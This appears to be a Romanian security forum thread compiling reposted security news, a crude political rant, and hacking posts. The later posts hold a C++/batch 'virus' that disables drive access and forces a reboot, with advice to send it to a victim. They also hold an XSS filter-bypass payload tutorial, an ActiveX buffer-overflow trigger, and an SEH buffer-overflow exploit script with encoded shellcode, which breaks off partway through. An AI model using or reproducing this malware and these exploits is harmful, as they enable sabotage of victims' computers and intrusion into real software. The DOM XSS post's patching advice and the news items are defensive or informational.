Matt

Laboratoarele de testare independente includ G Data in categoria "Advanced +" pentru detectie si numar scazut de rezultatele fals pozitive Programele de securitate sunt parte a kit-ului de baza al fiecarui utilizator de Internet – altfel, lucrurile ar fi prea usoare pentru infractorii cibernetici. Fiecare utilizator trebuie sa se asigure ca este protejat pe Internet; pentru asta este necesara o protectie eficienta recunoscuta de organismele de testare din domeniu. In testul "Real World Protection" recent publicat, AV-Comparatives a testat un numar de 19 dintre cele mai cunoscute solutii de securitate. Rezultatul: noua solutie G Data InternetSecurity 2014 s-a remarcat prin detectia codurilor malware si a fost recompensata cu "Advanced +". Detaliile testului Whole Product Dynamic Real World Protection Numarul suitelor de securitate pe Internet testate: 19 – inclusiv noua solutie G Data InternetSecurity 2014 Coduri malware folosite: 1.972 Perioada de testare: martie – iunie 2013 Test organizat de AV-Comparatives : http://www.av-comparatives.org/wp-content/uploads/2013/07/avc_prot_2013a_en.pdf G Data InternetSecurity 2014 integreaza noua marca G Data, tehnologia CloseGap, pentru a furniza in timp real cea mai buna protectie impotriva virusilor, hacking-ului, spam-ului si a altor amenintari online. Protectia mixta activa acopera, deasemenea, protectie impotriva amenintarilor specifice fiecarei tari. Firewall-ul functioneaza silentios in background si nu incetineste computerul. Modulul de control parental integrat ofera protectie copiilor si adolescentilor impotriva site-urilor cu continut inadecvat. Este rapid si usor de setat, ruleaza silentios in background si nu incetineste sistemul. NOU: Protectie activa mixta prin tehnologia CloseGap ce inchide bresele de securitate NOU: Autostart Manager accelereaza pornirea computerului NOU: Interfata de utilizare redesenata pentru utilizare intuitiva – nu necesita manual de utilizare IMBUNATATIT: Noua tehnologie BankGuard pentru cumparaturi si banking online sigure IMBUNATATIT: Monitorizare a comportamentului pentru protectie impotriva amenintarilor necunoscute IMBUNATATIT: Monitorizare a comportamentului pentru protectie impotriva amenintarilor necunoscute Control parental pentru protectia impotriva continutului neadecvat, ofertelor de abonamente, etc. Comparatie suplimentara a datelor, in timp real, in cloud pentru reducerea numarului de rezultate fals pozitive Recomandat pentru gameri: detectie de top si performanta ridicata – fara pop-up-uri suparatoare Consum de resurse scazut datorita tehnologiilor Fingerprinting, Idle Scan si Active Hybrid Protection Protectie pentru Smartphone-uri si tablete cu Android Versiuni si preturi disponibile in luna august: G Data InternetSecurity 2014 ESD pentru 1 PC: pret recomandat 18€ + TVA G Data InternetSecurity 2014 ESD pentru 3 PC-uri: pret recomandat 23€ + TVA Cerinte de sistem PC-uri cu Windows 8/7/Vista (32/64 bit) cu minim 1 GB RAM sau Windows XP (minim SP2, 32 bit), 512 MB RAM Despre G DATA Software AG G Data Software AG, cu sediul central in Bochum, este o companie cu o expansiune software inovativa si rapida care se concentreaza pe solutiile de securitate IT. Drept specialist in securitate pe Internet si pionier in domeniul protectiei antivirus, compania fondata in 1985 in Bochum, a produs primul program antivirus acum mai bine de 20 de ani si in 2010 si-a aniversat cei 25 de ani de activitate. G Data este printre primele companii dezvoltatoare de software de securitate din lume. De mai mult de cinci ani, nici un alt producator european de software de securitate nu a castigat mai multe premii internationale. Gama de produse cuprinde solutii de securitate atat pentru consumatori casnici, cat si pentru companii mici, medii si mari. Solutiile de securitate G Data sunt disponibile in mai mult de 90 de tari din intreaga lume. Mai multe informatii despre companie si solutiile G Data sunt disponibile pe International - G Data Software AG Despre AV Security Software Distribution AV Security Software Distribution este o companie tanara, infiintata la inceputul anului 2011 pentru a deveni distribuitor oficial G Data Software in Romania, din dorinta unor tineri si ambitiosi profesionisti de a demonstra ca pot sa creasca imaginea unui brand de nivel mondial, pe piata din Romania, la nivelul pe care acesta il are in Germania si in restul lumii. Oferta de parteneriat include solutii software antivirus de inalta calitate si este adresata resellerilor, integratorilor de sistem si retailerilor. Beneficiile oferite de solutiile „Made in Germany“ dezvoltate de G Data sunt: profitabilitate, performanta, productivitate marita, usurinta in exploatare, cel mai bun raport calitate-pret de pe piata. Mai multe despre companie si distributia solutiilor G Data in Romania gasiti pe site-ul AV Security Software Distribution - Distribuitor autorizat G Data Romania Sursa : AV Security Software Distribution - Distribuitor autorizat G Data Romania

Compania independenta de cerecetari in domeniul IT, NSS Labs, a dat publicitatii rezultatele unui studiu, in urma caruia s-a constatat care este cel mai sigur browser pentru navigarea pe internet. In timpul cercetarii amintite, browserul Internet Explorer 10 a recunoscut cel mai mare numr de site-uri suspecte, comparativ cu celelalte browsere testate, trimitand atentionari catre utilizator, noteaza Tech News. Browserul Microsoft, de asemenea, ne anunta extrem de repede daca site-ul pe care vrem sa-l deschidem este periculos pentru siguranta calculatorului nostru. Cercetarea a fost desfasurata intre 13 martie si 19 aprilie 2013. Eficacitatea sistemului de siguranta a browserelor a fost testata, utilizandu-se 754 de linkuri care duceau catre pagini suspecte. Expertii au incercat, in acelasi timp, sa intre pe aceleasi site-uri suspecte, fiecare browser testat avand la activ 18.000 de incercari. Computerele au functionat cu ajutorul sistemului operational Microsoft Windows 8 Enterprise. Internet Explorer 10 s-a dovedit a fi cel mai eficient si cel mai sigur, descoperind 99,96% din link-urile suspecte. Pe locul doi s-a situat Google Chrome cu o eficacitate de 83,16%. Safari, al celor de la Apple, si Firefox 19 ocupa locul trei, respectiv patru, cu indicatori de 10,15% si 9,92%. Opera 12 detecteaza site-uri suspecte in doar 1,87% din cazuri. A reiesit ca Firefox si Safari blocheaza 1 din zece site-uri suspecte. Asta inseamna ca celelalte noua trebuie sa fie oprite cu ajutorul antivirusului instalat pe computer. Chrome opreste 8 din 9 accesari, in timp ce lui Explorer 10 ii scapa doar 4 site-uri din 1000. Utilizatorii de Opera sunt practic fara aparare, arata analiza NSS Labs. In toate cazurile, browserele il atentioneaza pe utilizator despre faptul ca site-ul pe care umreaza sa il viziteze poate provoca daune calculatorului, insa nu pot bloca accesul vizitatorului. Aceasta cercetare nu e singura care stabileste ca Internet Exoplorer este cel mai sigur browser. In septembie 2012, NSS Labs a desemnat toate cele nou vesriuni ale browserului ca fiind cele mai sigure. Internet Explorer s-a dovedit a fi si cel mai mic consumator de energie. Sursa Ziare.com

Germania a anulat acordurile privind schimbul de date cu SUA, Marea Britanie si Franta, incheiate in 1968, care permiteau serviciilor speciale ale acestor tari sa efectueze monitorizari pe teritoriul Germaniei, in urma scandalului de spionaj vizand un program de interceptari ale convorbirilor telefonice si pe internet, a relatat Russia Today, citand Deutsche Welle in limba rusa. Potrivit surselor citate, Ministerul german de Externe a trimis deja notificari in acest sens celor trei state. "Rezilierea contractelor din cauza evenimentelor din ultimele saptamani a devenit o consecinta necesara si adecvata a disputelor legate de protectia vietii private", a explicat ministrul german de externe Guido Westerwelle, citat de publicatia electronica Vzgliad. Acordurile privind schimbul de date au fost semnate de catre parti dupa adoptarea de catre Germania in 1968 a legii privind limitarea secretului corespondentei, precum si al comunicatiile postale si telefonice.Este vorba de asa-numita lege G10. Aceasta lege permite serviciilor de securitate verificarea a pana la 20% din astfel de comunicatii si conexiuni intre Germania si alte tari. Documentele respective permiteau in plus utilizarea datelor Biroului Federal pentru Protectia Constitutiei sau ale Serviciului Federal de Informatii german (BND) de catre cele trei tari. La sfarsitul lunii iunie, mass-media germane au relatat ca Agentia de Securitate Nationala a SUA (NSA) intercepteaza pana la 500 milioane de convorbiri telefonice si postari pe Internet. Toate aceste informatii au ajuns in atentia opiniei publice dupa ce, acum mai bine de o luna, fostul consultant al serviciilor secrete Edward Snowden a dezvaluit presei britanice date despre un program secret al guvernului american privind supravegherea electronica la nivel global. Sursa Business24.ro

Video : Inside Scoop: Wi-Fi routers susceptible to hacking | CNET TV | Video Product Reviews, CNET Podcasts, Tech Shows, Live CNET Video The research team that discovered significant security holes in more than a dozen home Wi-Fi routers adds more devices to that list at Defcon 21. More major brand-name Wi-Fi router vulnerabilities continue to be discovered, and continue to go unpatched, a security researcher has revealed at Defcon 21. Jake Holcomb, a security researcher at the Baltimore, Md.-based firm Independent Security Evaluators and the lead researcher into Wi-Fi router vulnerabilities, said that problem is worse than when ISE released its original findings in April. The latest study continues to show that the small office and home office Wi-Fi routers are "very vulnerable to attack," Holcomb said. "They're not a means to protect your network and your digital assets," he cautioned. Holcomb is a relatively young researcher, in his mid-20s, who turned his lifelong interest in computer security into a professional career only in the past year. Previously, he was doing network security for a school district in Ohio. The new report details 56 new Common Vulnerabilities and Exposures, or CVEs, that Holcomb and the other ISE researchers have found in popular routers. These include the Asus RT-AC66U, D-Link DIR-865L, and TrendNet TEW-812DRU, for which Holcomb plans on demonstrating vulnerabilities at Defcon on Saturday and Sunday. Requests for comment from the affected vendors were not immediately returned. CNET will update this story when we hear from them. You might not think that the router security holes could affect you, or would be easy to exploit, but Holcomb explained that because the vulnerabilities appear to affect most routers, and are hard to fix, these could put nearly every person who connects to a vulnerable router at risk. The scenario he explained from the noisy hallways of the Rio Convention Center here was a common one. Small-business and home Wi-Fi router administration often employs weak passwords, or static passwords that are the same across multiple stores, like a Starbucks. The Asus RT-AC66U, one of the routers that has been discovered to have vulnerabilities. All an attacker has to do is go to his favorite Seattle-based coffee joint, buy a venti latte and a low-fat pumpkin ginger muffin, and get the establishment's Wi-Fi password. Then, equipped with access to the Wi-Fi network, all that attacker would have to do is use one of the exploits that ISE has uncovered. The router would be compromised, including all the Web traffic flowing through it. Holcomb compared the problem of fixing routers to traditional PCs. "In most cases, automatic updates are enabled for Windows and Mac," he said. But, he added, "even if a router manufacturer were to implement a similar feature, most people don't log into their routers." Basically, because people have been trained to think of the router as a set-it-and-forget-it device, and one without security flaws, it's nearly impossible to get them to update router firmware. The TrendNet TEW-812DRU, another of the routers that has been discovered to have vulnerabilities. The fix won't be an easy one, at least not logistically. "I think the solution is for routers to automatically update, and give users the ability to opt out of it," Holcomb said. But given the reluctance of some major router manufacturers to address the problems, these exploits could exist unpatched in the wild for years to come. Holcomb said that while TP-Link fixed all the vulnerabilities that ISE reported to it, D-Link has never responded. And Linksys, he said, chose not to repair many of the vulnerabilities reported to it. In the case of the Linksys EA-6500, someone can place their own code in the router's configuration file and overwrite it. "It's an attack that relies heavily on social engineering," said Holcomb, "but it's an example of the vendors not resolving a vulnerability. Why [not], I don't know." Under the guidelines of responsible disclosure, Holcomb says that ISE notified all router manufacturers of the vulnerabilities discovered before going public with them, giving them a chance to fix them. http://asset3.cbsistatic.com/cnwk.1d/i/tim2/2013/08/02/DIR865Lfront_610x317.pngThe D-Link DIR-865L, also discovered to have vulnerabilties. Holcomb will be demonstrating how to take control of three different routers using a different vulnerability in each. For the aforementioned Asus router, he plans to demonstrate a buffer overflow exploit; for the D-Link he plans to use Web-based and symlink directory traversal exploits; and he will attack the TrendNet router using a cross-site scripting forgery and command injection exploit. "All three give us a root shell," he said, meaning access to the router's lowest levels of code. Sursa News.cnet.com Stirea in limba Romana : SmartNews.Ro

Reports say user IP addresses revealed, mail down, malware spreading Network anonymisation outfit TOR has posted a fascinating piece of commentary on reports that some of the anonymous servers it routes to have disappeared from its network. “Around midnight on August 4th we were notified by a few people that a large number of hidden service addresses have disappeared from the Tor Network,” the piece starts. “There are a variety of rumors about a hosting company for hidden services: that it is suddenly offline, has been breached, or attackers have placed a javascript exploit on their web site”. As it explores the rumours, the post goes on to name an entity called Freedom Hosting, and to vigorously dissociate TOR from the organisation. Distancing TOR from Freedom seems a fine idea given numerous reports, such as this from The Irish Examiner, suggest its founder Eric Eoin Marques has been arrested because the FBI believes he facilitated the distribution of child pornography using TOR. The FBI wants to extradite Marques to the USA. TOR's not sure if the arrest and the disappearance of some nodes is linked, but is saying “someone has exploited the software behind Freedom Hosting … in a way that it injects some sort of javascript exploit in the web pages delivered to users.” That payload results in malware reaching users' PCs, possibly thanks to “potential bugs in Firefox 17 ESR, on which our Tor Browser is based.” TOR is “investigating these bugs and will fix them if we can”. Various forums online, however, report that the malware has spread beyond sites hosted by Freedom. Some suggest TORmail, TOR's secure email service, may also have been compromised, or that the attack means TOR is no longer able to mask users' IP addresses. TOR's post says it's not sure what's really happening and that it will update users once it learns more. We'll do likewise. ® Sursa TheRegister.co.uk

Scopul : Schimbarea Ei nu ies la vot.

Ne plangem degeaba.Noi ne alegem conducatorii. Ca e Basescu ca e Ponta ca e Iliescu toti sunt o apa si un pamant. Depinde doar gradul de rautate pe care il au.Ne meritam soarta. Ne-am executat conducatorul. Am votat mereu pe cei care dau exemplele cele mai bune, care doar dau exemple. Nu avem nicio sansa de supravietuire in urmatorii 50+ ani, poate doar daca vom fi ocupati de alt popor. Avem mass-media de cacat unde doar stirile cancan si mondene sunt pe prima pagina. Nu tu stiri de cultura, nu tu stiri de muzica ( straina ), nu tu literatura. Bacalaureatul e inutil.Se ia cum se ia.Cei bulangii iau fara probleme bacul, unii care poate mai invata si sunt mai amarati nu iau bacul si se duc pe pula la sapa. Televiziunile sunt de cacat, nu avem 2 canale calumea , am 20 canale de muzica la care nu se uita nimeni, 10 canale de sport cu emisiuni despre o singura echipa, despre cacat si iarasi cacat. Ce putem face? Nimic, nu o sa mai iasa nimeni in strada pentru ca suntem niste prosti si nu suntem in stare sa mergem sa ne returnam produsele inapoi cand sunt stricate, dar sa iesim in strada pentru o schimbare.

Acelasi mesaj l-am primit si eu de la acelasi user.Se pare ca si-a facut de cap

In engleza intelegi cel mai bine.E esential sa stii engleza mai ales in domeniul asta.

A Hacker with handle "Pr3 H4ck3r" from Philippine Cyber Army has claimed to have hacked into the database of the Navy website. According to hacker's statement, he compromised the data by exploiting the SQL Injection vulnerability in the Navy's "BRP Alcaraz blog" page (navy.mil.ph/alcaraz). However, we are not able to access the given link at the time of writing. It appears the admin has taken down the link. The news was first reported by local hacking news site PinoyHackNews. In a pastebin post(pastebin.com/5xhP6zft), hackers leaked the login credentials compromised from the database. It includes the Admin login credentials. What's worse is that they are using very weak username and password. They have used the "userpassword" as password. Even if there is no bug, hacker could have guessed the password or get the password by brute-forcing. It is sad to know that the Navy website itself has poor security and weak passwords. Sursa EHackingNews.Com

Simple Machines Forum(SMF), one of the top free open Source forum software, has revealed that its official website was compromised by intruders on the 20th of July. Hacker compromised one of the admins account password that allowed him to gain access to the database server which contains the users' data. SMF admitted that user data has been compromised by saying "we are 100% sure that our user database has been stolen". The stolen data includes password, personal messages and other info. SMF said in their community page. Users are urged to change the passwords. If you have used the same password anywhere else, it is recommended to change the password there also. According to the SMF report, the attackers get the admin password by hacking into another website where the admin is one of the member. The admin is reportedly used the same password in their website also that helped the attackers to take advantage of. This is just an example of why you shouldn't use the same password on multiple websites. We are thankful to one of EHN's Greek reader "IGuru" to inform us about the announcement. Sursa EHackingNews.Com

The official website of National Database and Registration Authority of Pakistan Government is down after Afghan Cyber Army(ACA) crashed the database server. Trying to access the "nadra.gov.pk" will end up in the "connection has time out" error message that confirms the hacker's claim. NADRA.pk website is down "This hack is a response to the rocket attacks of Pakistan military on Kunar and Jalalabad Provinces of Afghanistan!" Speaking to E Hacking News, the hacker stated as the reason behind the attack. "Next time wait for bigger damage, We will not let any torture and overtaking on our land unanswered. " This is not the first time Afghan hackers targeting Pakistan Government websites, we aware of the recent Afghan Cyber Army attack on multiple Pakistan Government websites. The websites were left defaced. Sursa EHackingnews.com

Hi friends,here i give you give the C++ virus code. Actually Batch code is converted to C++ virus code. If you like you can use it as batch code also. C++ Virus Code : #include < windows.h > #include < fstream.h > #include < iostream.h > #include < string.h > #include < conio.h > int main() { ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/ write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; } Copy the above code and paste in notepad Save the file with .cpp extension Compile and create .exe file in cpp Note: Don't run this c++ program ,it will attack your system itself. Copy the created .exe file and send it to your victim. You can also attach it with any other exe files. Batch Virus Code Creation: REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n shutdown -r -c \"Sorry Your System is hacked by us!\" -f I think this code will simple for non c++ programmers. It is easy to create the batch file also. Copy the above code to notepad. Save it with .bat extension (for ex: nodrivevirus.bat) Send the file to your victim. Sursa BreakTheSecurity.Com

So far i have provided few Web Application Pen Testing tutorials . Now it is time to for practicing your hacking / pentesting skills in legal way. Last time , i explained about the Damn Vulnerable Web Application(DVWA). Now, i've come with different web application that will help you to improve your knowledge in web app pentesting. The BodgeIt Store Like DVWA, This is also a Vulnerable web Application that will help you to develop your skills in Pen testing. With this Vulnerable Application , you can practice the Following attacks: Cross Site Scripting (XSS) SQL injection (SQLi) Hidden (but unprotected) content Cross Site Request Forgery Debug code Insecure Object References Application logic vulnerabilities There is also a 'scoring' page (linked from the 'About Us' page) where you can see various hacking challenges and whether you have completed them or not. How to setup the Pen Testing Lab? BodgeIt app (download) Tomcat server Download the bodgeit.1.3.0.zip file and extract the zip file . Now you will get a WAR file(bodgeit.WAR). step 1:Install the Tomcat Install the Tomcat in your system. If you don't know how to do install the tomcat , do google search. Step 2: Start the server Start the tomcat server. In Ubuntu, type the following command in Terminal: sudo /etc/init.d/tomcat6 start For windows users, just click the tomcat server in all programs. Step 3: Open the browser and type "localhost:8080". It will show a page "It works !". There you can access the manager webapp(http://localhost:8080/manager/html) page. Clicking the link will ask to enter the username and password. enter your computer username and password. Step 4: Now you are in "Tomcat Web Application Manager" page. Scroll down and there you can see the WAR file to deploy form. Step 5: Deploying the WAR click the Browse button and select the bodgeit.WAR file . Now click the Deploy button. http://1.bp.blogspot.com/-XBEcZ0200cM/TyZFTKt0tDI/AAAAAAAABXw/xZ7o97a3_Y8/s450/War+deploy.jpg Yes, Now the Application successfully installed.. Access the BodgeIt in this location: http://localhost:8080/bodgeit/ Sursa BreakTheSecurity.Com

Sometimes, website owner use XSS filters(WAF) to protect against XSS vulnerability. For eg: if you put the <scirpt>alert("hi")</script> , the Filter will escape the "(quote) character , so the script will become <script>alert(>xss detected<)</script> Now this script won't work. Likewise Filters use different type of filtering method to give protection against the XSS. In this case, we can use some tricks to bypass the filter. Here i am going to cover that only. 1.Bypassing magic_quotes_gpc The magic_quotes_gpc=ON is a PHP setting(configured in PHP.ini File) , it escapes the every ' (single-quote), " (double quote) and \ with a backslash automatically. For Eg: <scirpt>alert("hi");</script> will be filtered as <script>alert(\hi\)</script>.so the script won't work now. This is well known filtering method, but we can easily bypass this filter by using ASCII characters instead. For Eg: alert("hi"); can be converted to String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59) so the script will become <script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>. In this case there is no "(quotes) or '(single quotes) or / so the filter can't filter this thing. Yes, it will successfully run the script. String.fromCharCode() is a javascript function that converts ASCII value to Characters. How to convert to ASCII values? There are some online sites that converts to ASCII character. But i suggest you to use Hackbar Mozilla addon . After installing hackbar add on ,press F9. It will open the small box above the url bar. click the XSS->String.fromCharCode() Now it will popup small window. enter the code for instance alert("Hi"). click ok button. Now we got the output. copy the code into the <script></script> inside and insert in the vulnerable sites For eg: hxxp://vulnerable-site/search?q=<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script> 2.HEX Encoding we can encode our whole script into HEX code so that it can't be filtered. For example: <script>alert("Hi");</script> can be convert to HEX as: %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e Now put the code in the vulnerable site request. For ex: hxxp://vulnerable-site/search?q=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e Converting to HEX: This site will convert to hex code: http://centricle.com/tools/ascii-hex/ 3.Bypassing using Obfuscation Some website admin put the script,alert in restricted word list. so whenever you input this keywords, the filter will remove it and will give error message like "you are not allowed to search this". This can bypassed by changing the case of the keywords(namely Obfuscation). For eg: <ScRipt>ALeRt("hi");</sCRipT> This bypass technique rarely works but giving trial is worth. 4. Closing Tag Sometimes putting "> at the beginning of the code will work "><script>alert("Hi");</script> This will end the previous opened tag and open our script tag. Example: hxxp://vulnerable-site/search?q="><script>alert("Hi");</script> Conclusion: From above article, it is clear that XSS filters alone not going to protect a site from the XSS attacks. If you really want to make your site more secure, then ask PenTesters to test your application or test yourself. Also there are lot of different filter bypassing technique, i just covered some useful techniques for you. Sursa Breakthesecurity.com

What is DOM? DOM is expanded as Document object model that allows client-side-scripts(Eg: Javascript) to dynamically access and modify the content, structure, and style of a webpage. Like server-side scripts, client-side scripts can also accept and manipulate user input with the help of DOM. Here is a very simple HTML code that accepts and writes user input using JavaScript with the help of DOM. <html> <head> </head> <body> <script> var pos=document.URL.indexOf("BTSinput=")+9; //finds the position of value var userInput=document.URL.substring(pos,document.URL.length); //copy the value into userInput variable document.write(unescape(userInput)); //writes content to the webpage </script> </body> </html> If you know HTML and Javscript, understanding the above code is a piece of cake. In the above example, the javascript code gets value from the url parameter "BTSinput" and writes the value in our webpage. For example, if the url is www.BreakThesecurity.com/PenTesting?BTSinput=default The webpage will display "default" as output. Did you notice ?! The part of the webpage is not written by Server-side script. The client side script modifies the content dynamically based on the input. Everything done with the help of DOM object 'document'. DOM Based XSS vulnerability: When a developer writes the content using DOM object without sanitizing the user input , it allow an attacker to run his own code. In above example, we failed to sanitize the input and simply displayed the whatever value we get from the url. An attacker with malicious intention can inject a xss vector instead . For example: www.BreakThesecurity.com/PenTesting?BTSinput=<script>alert("BreakTheSec")</script> As i said earlier, the document.write function simply writes the value of BTSinput parameter in the webpage. So it will write the '<script>alert("BreakTheSec")</script>' in the webpage without sanitizing. This results in running the script code and displays the alert box. Patching the DOM Based Cross Site Scripting Vulnerability Audit all JavaScript code in use by your application to make sure that untrusted data is being escaped before being written into the document, evaluated, or sent as part of an AJAX request. There are dozens of JavaScript functions and properties which must be protected, including some which are rather non-obvious: The document.write() function The document.writeln() function The eval() function, which executes JavaScript code from a string The execScript() function, which works similarly to eval() The setInterval(), setTimeout(), and navigate() functions The .innerHTML property of a DOM element Certain CSS properties which allow URLs such as .style, .backgroundImage, .listStyleImage, etc. The event handler properties like .onClick, which take JavaScript code as their values Any data which is derived from data under the client's control (e.g. request parameters, headers, query parameters, cookie names and values, the URL of the request itself, etc.) should be escaped before being used. Examples of user-controlled data include document.location (and most of its properties, e.g. document.location.search), document.referrer, cookie names and values, and request header names and values. You can use the JavaScript built-in functions encode() or encodeURI() to handle your escaping. If you write your own escaping functions, be extremely careful. Rather than using a "black list" approach (where you filter dangerous characters and pass everything else through untouched), it is better to use a "white list" approach. A good white list approach is to escape everything by default and allow only alphanumeric characters through. Reference: Vulnerability & Exploit Database | Rapid7 Sursa Breakthesecurity.com

Description : # Exploit Title: StarUML WinGraphviz.dll ActiveX buffer overflow vulnerability # Date: 03.8.2013 # Exploit Author: d3b4g # Vendor Homepage:StarUML - The Open Source UML/MDA Platform # Software Link: StarUML - The Open Source UML/MDA Platform # Tested on: Windows XP SP3 Author : d3b4g Source : StarUML WinGraphviz.dll - ActiveX Buffer Overflow Vulnerability Code : About StarUML -------------- StarUML is an open source project to develop fast, flexible, extensible, featureful, and freely-available UML/MDA platform running on Win32 platform. Exception Code: ACCESS_VIOLATION Disasm: D98439 MOV DL,[EBP] (WinGraphviz.DLL) Seh Chain: -------------------------------------------------- 1 6B47D959 VBSCRIPT.dll 2 772FE115 ntdll.dll Called From Returns To -------------------------------------------------- Registers: -------------------------------------------------- EIP 00D98439 -> Asc: http://test\test\test\te?s\test\test\tes\ttest\tes EAX 00894119 -> Asc: http://test\test\test\te?s\test\test\tes\ttest\tes EBX 0020D70A -> 00000038 ECX 00894119 -> Asc: http://test\test\test\te?s\test\test\tes\ttest\tes EDX 000003FF EDI 000003FE ESI 00000000 EBP 00000000 ESP 0020D618 -> 00000059 The example code below triggers the vulnerability ------------------------------------------------- <object classid='clsid:1F25D86C-95BC-4E33-A177-EE8DABEF8B04' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\StarUML\WinGraphviz.dll" prototype = "Function ToDot ( ByVal Source As String ) As String" memberName = "ToDot" progid = "WINGRAPHVIZLib.NEATO" argCount = 1 arg1="http://test\test\test\te?s\test\test\tes\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\" target.ToDot arg1 </script>

Description : #!/usr/bin/python # ========================================================================================== # Exploit Title: Easy LAN Folder Share Version 3.2.0.100 Buffer Overflow vulnerability (SEH) # Date: 2013-08-03 # Exploit Author: sagi- # Original Bug Found By: ariarat # Vendor Homepage: http://www.mostgear.com # Software Link: Easy LAN Folder Share - Free download and software reviews - CNET Download.com # Version: 3.2.0.100 # Tested On: Windows XP Professional SP2 & SP3 (ENG) # ========================================================================================== # The registration code field in the 'activate license' window is vulnerable to a buffer overflow. # This script generates a malicious registry file. # Once the generated file has been loaded into the registry, execute the application as normal. # ========================================================================================== # Greetz: corelanc0d3r, g0tmi1k # ========================================================================================== Author : sagi- Source : Easy LAN Folder Share Version 3.2.0.100 - Buffer Overflow Exploit (SEH) Code : header = "Windows Registry Editor Version 5.00\n\n" header += "[HKEY_LOCAL_MACHINE\SOFTWARE\MostGear\EasyLanFolderShare_V1\License]\n" header += "\"BeginDate\"=\"8/2/2013\"\n" header += "\"ExpireDate\"=\"8/17/2013\"\n" header += "\"UserName\"=\"a\"\n" header += "\"Serial\"=\"" junk = "\x41" * 550 nseh = "\xEB\x27\x90\x90" # jmp short 0x29 seh = "\xEF\x03\xFC\x7F" # pop pop ret padding = "\x90" * 33 # Required as some random characters appear on the stack #msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/alpha_upper -t c #[*] x86/alpha_upper succeeded with size 469 (iteration=1) shellcode = ( "\x89\xe2\xd9\xf6\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49\x49\x43" "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x39\x33\x30" "\x43\x30\x53\x30\x35\x30\x4c\x49\x4b\x55\x46\x51\x38\x52\x43" "\x54\x4c\x4b\x30\x52\x56\x50\x4c\x4b\x36\x32\x44\x4c\x4c\x4b" "\x36\x32\x54\x54\x4c\x4b\x33\x42\x47\x58\x54\x4f\x4f\x47\x50" "\x4a\x46\x46\x56\x51\x4b\x4f\x36\x51\x59\x50\x4e\x4c\x37\x4c" "\x55\x31\x43\x4c\x43\x32\x36\x4c\x51\x30\x49\x51\x48\x4f\x34" "\x4d\x43\x31\x48\x47\x4a\x42\x4a\x50\x36\x32\x50\x57\x4c\x4b" "\x50\x52\x44\x50\x4c\x4b\x47\x32\x37\x4c\x43\x31\x48\x50\x4c" "\x4b\x57\x30\x44\x38\x4c\x45\x59\x50\x44\x34\x31\x5a\x53\x31" "\x4e\x30\x50\x50\x4c\x4b\x50\x48\x32\x38\x4c\x4b\x36\x38\x37" "\x50\x55\x51\x48\x53\x4a\x43\x47\x4c\x47\x39\x4c\x4b\x50\x34" "\x4c\x4b\x35\x51\x48\x56\x46\x51\x4b\x4f\x56\x51\x59\x50\x4e" "\x4c\x39\x51\x58\x4f\x44\x4d\x35\x51\x49\x57\x50\x38\x4d\x30" "\x34\x35\x4c\x34\x35\x53\x43\x4d\x4c\x38\x37\x4b\x33\x4d\x46" "\x44\x44\x35\x4a\x42\x51\x48\x4c\x4b\x56\x38\x36\x44\x43\x31" "\x39\x43\x33\x56\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x30\x58\x45" "\x4c\x35\x51\x4e\x33\x4c\x4b\x33\x34\x4c\x4b\x55\x51\x4e\x30" "\x4d\x59\x57\x34\x46\x44\x47\x54\x51\x4b\x31\x4b\x53\x51\x46" "\x39\x50\x5a\x56\x31\x4b\x4f\x4d\x30\x31\x48\x51\x4f\x30\x5a" "\x4c\x4b\x32\x32\x4a\x4b\x4c\x46\x51\x4d\x42\x4a\x53\x31\x4c" "\x4d\x4c\x45\x58\x39\x55\x50\x43\x30\x45\x50\x30\x50\x42\x48" "\x56\x51\x4c\x4b\x52\x4f\x4d\x57\x4b\x4f\x48\x55\x4f\x4b\x4b" "\x4e\x44\x4e\x36\x52\x4a\x4a\x43\x58\x39\x36\x4d\x45\x4f\x4d" 